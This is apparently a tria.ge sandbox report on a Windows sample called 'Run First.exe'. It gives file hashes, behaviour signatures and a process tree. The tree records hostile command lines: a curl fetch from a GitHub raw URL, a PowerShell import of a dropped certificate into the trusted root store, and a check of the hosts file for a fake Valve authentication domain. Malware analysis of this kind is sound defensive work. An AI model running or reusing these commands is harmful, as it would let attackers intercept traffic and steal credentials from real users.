Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    17s
  • max time network
    22s
  • platform
    windows7_x64
  • resource
    win7-20240221-de
  • resource tags

    arch:x64, arch:x86, image:win7-20240221-de, locale:de-de, os:windows7-x64, system, windows
  • submitted
    20/04/2024, 15:54

General

  • Target

    Run First.exe

  • Size

    896KB

  • MD5

    3df354a50e13f7316e44b01739f99f2e

  • SHA1

    a1d1c697cadecbab3c043259acae1c162e767f96

  • SHA256

    5b05b1d4dc439d81003bc6fe8348716667070b69825222b2e0a9f91d66f86616

  • SHA512

    25242ca3eb37d73e40df0682cc6e948f3d01b9741969de081edb7086b25dc064937cb4364b00882da5e78166c94d544ce1c54792b919c561593c70b0da842708

  • SSDEEP

    12288:oqDEvFo+yo4DdbbMWu/jrQu4M9lBAlKhQcDGB3cuBNGE6iOrpfe4JdaDgaETy:oqDEvCTbMWu7rQYlBQcBiT6rprG8aky

Score
8/10

Malware Config

Signatures

  • Drops file in Drivers directory 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 12 IoCs
  • Suspicious use of SendNotifyMessage 12 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Run First.exe
    "C:\Users\Admin\AppData\Local\Temp\Run First.exe"
    1⤵
    • Drops file in System32 directory
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2156
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Windows\System32\k.bat
      2⤵
      • Drops file in Drivers directory
      • Suspicious use of WriteProcessMemory
      PID:2460
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c curl -s https://raw.githubusercontent.com/Suryajung8/aaaaaaaa/main/tori.xyzzz
        3⤵
        PID:2560
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo "
        3⤵
        PID:2136
      • C:\Windows\SysWOW64\findstr.exe
        findstr /R "^[0-9]*\.[0-9]*\.[0-9]*\.[0-9]*$"
        3⤵
        PID:1036
      • C:\Windows\SysWOW64\certutil.exe
        certutil -store TrustedRoot
        3⤵
        PID:2944
      • C:\Windows\SysWOW64\findstr.exe
        findstr /i /c:"C:\Windows\System32\server.crt"
        3⤵
        PID:2284
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -ExecutionPolicy Bypass -Command "Import-Certificate -FilePath 'C:\Windows\System32\server.crt' -CertStoreLocation 'Cert:\LocalMachine\Root' -ErrorAction SilentlyContinue"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1512
      • C:\Windows\SysWOW64\findstr.exe
        findstr /C:" api.valveauthentication.xyz" "C:\Windows\System32\drivers\etc\hosts"
        3⤵
        PID:2940
      • C:\Windows\SysWOW64\ipconfig.exe
        ipconfig /flushdns
        3⤵
        • Gathers network information
        PID:2540

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Windows\SysWOW64\k.bat

    Filesize

    1010B

    MD5

    cd4130fd318d21dcddbee0d7829cf258

    SHA1

    dc5a2f65c5b26f2cba1c3214760c00e05358ea51

    SHA256

    426a5f5e2d51f72dd1085102b437d0c1751da2f33374d2d8deff6e92e3e77a81

    SHA512

    7184a2e9d92dba35b50fa7f57b79af65e93453b11c50b098ecfb10f349d8484fb33b84b524ccb7ce64d66b4d7bd7a499877caabb7845025fe0d9d7a467e0616c

  • C:\Windows\System32\drivers\etc\hosts

    Filesize

    5B

    MD5

    ec92700e9dd452ac45503ce6e98f11a3

    SHA1

    718b0059b629b63dc87bd3ef892f76f6e1371705

    SHA256

    688787fbb991b11b4e767d01c6da762e35a9aa8fdf3b2e74bf44d658f04c3067

    SHA512

    ed31b3af22a5b0718a3dc551d3cd9661972f1bd56af760d1edd977fb87b3c38195d1338bf86492560f6d157ea2d80a7b676927c557f26750846e2d85b1e55c7e

  • memory/1512-8-0x00000000745B0000-0x0000000074B5B000-memory.dmp

    Filesize

    5.7MB

  • memory/1512-9-0x00000000745B0000-0x0000000074B5B000-memory.dmp

    Filesize

    5.7MB

  • memory/1512-10-0x0000000002530000-0x0000000002570000-memory.dmp

    Filesize

    256KB

  • memory/1512-11-0x0000000002530000-0x0000000002570000-memory.dmp

    Filesize

    256KB

  • memory/1512-12-0x0000000002530000-0x0000000002570000-memory.dmp

    Filesize

    256KB

  • memory/1512-13-0x00000000745B0000-0x0000000074B5B000-memory.dmp

    Filesize

    5.7MB